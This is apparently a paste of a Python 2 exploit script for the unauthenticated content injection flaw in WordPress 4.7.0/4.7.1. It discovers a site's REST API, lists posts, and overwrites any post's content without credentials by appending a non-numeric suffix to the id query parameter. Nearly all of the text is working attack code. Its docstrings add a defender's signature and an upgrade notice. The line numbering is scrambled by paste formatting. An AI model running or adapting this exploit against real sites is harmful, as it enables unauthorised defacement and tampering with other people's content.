Falcon-G21

WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (P

Feb 6th, 2017
  1. import json
  2. import sys
  3. import urllib2
  4.  
  5. from lxml import etree
  6.  
  7.  
def get_api_url(wordpress_url):
    """Return the REST API root URL that a WordPress page advertises.

    Fetches ``wordpress_url``, parses the HTML and reads the ``href`` of the
    first ``<link rel="https://api.w.org/">`` element.

    Raises whatever ``urllib2.urlopen`` raises on a failed fetch. Indexing
    the xpath result with ``[0]`` fails (IndexError) when the page carries
    no such link element.
    """
    page_html = urllib2.urlopen(wordpress_url).read()
    document = etree.HTML(page_html)

    advertised = document.xpath('//link[@rel="https://api.w.org/"]/@href')
    api_root = advertised[0]

    # A root containing 'rest_route' means the API is addressed through a
    # query parameter; the later path concatenation assumes path-style URLs.
    if 'rest_route' in api_root:
        print(' ! Warning, looks like permalinks are not enabled. This might not work!')

    return api_root
  19.  
  20.  
def get_posts(api_base):
    """Print id, rendered title and link of each post the API lists.

    Requests ``api_base + 'wp/v2/posts'`` with no credentials and decodes
    the body as JSON. Nothing is returned; output goes to stdout.
    """
    listing = urllib2.urlopen(api_base + 'wp/v2/posts').read()

    for entry in json.loads(listing):
        summary = ' - Post ID: {}, Title: {}, Url: {}'.format(
            entry['id'], entry['title']['rendered'], entry['link'])
        print(summary)
  28.  
  29.  
def update_post(api_base, post_id, post_content):
    """POST a JSON body with a new ``content`` field to the posts endpoint.

    The request carries only a Content-Type header: no cookie, nonce or
    Authorization header is attached. The response body is decoded as JSON
    and its ``link`` field is printed.

    NOTE(review): the path segment carries ``post_id`` as given, while the
    ``id`` query parameter carries the same value with a non-numeric suffix.
    For defenders, a REST posts request whose ``id`` query value is not
    purely numeric, or differs from the id in the path, is the signature to
    look for in access logs and to block at a WAF. Sites running the
    versions named in the paste title should be upgraded to a later release.
    """
    # more than just the content field can be updated. see the api docs here:
    # https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
    payload = json.dumps({'content': post_content})

    endpoint = 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
    headers = {'Content-Type': 'application/json'}
    # Passing a data argument makes urllib2 issue a POST rather than a GET.
    request = urllib2.Request(api_base + endpoint, payload, headers)
    reply = json.loads(urllib2.urlopen(request).read())

    print('* Post updated. Check it out at {}'.format(reply['link']))
  42.  
  43.  
def print_usage():
    """Print the command-line synopsis, with this file's path as the program name."""
    synopsis = 'Usage: {} <url> (optional: <post_id> <file with post_content>)'
    print(synopsis.format(__file__))
  46.  
  47.  
if __name__ == '__main__':
    # Accepted forms: <url> alone (list posts) or <url> <post_id> <file>.
    cli_args = sys.argv[1:]

    # ensure we have at least a url
    if not cli_args:
        print_usage()
        sys.exit(1)

    # a post id without a content file is rejected
    if len(cli_args) == 2:
        print('Please provide a file with post content with a post id')
        print_usage()
        sys.exit(1)

    print('* Discovering API Endpoint')
    api_url = get_api_url(cli_args[0])
    print('* API lives at: {}'.format(api_url))

    # with only a url, list the posts the API exposes and stop
    if len(cli_args) == 1:
        print('* Getting available posts')
        get_posts(api_url)

        sys.exit(0)

    # from here on a post id and a content file are both present
    target_id = cli_args[1]
    print('* Updating post {}'.format(target_id))
    # The whole file is read and sent as the replacement post content.
    with open(cli_args[2], 'r') as source:
        replacement = source.read()

    update_post(api_url, target_id, replacement)

    print('* Update complete!')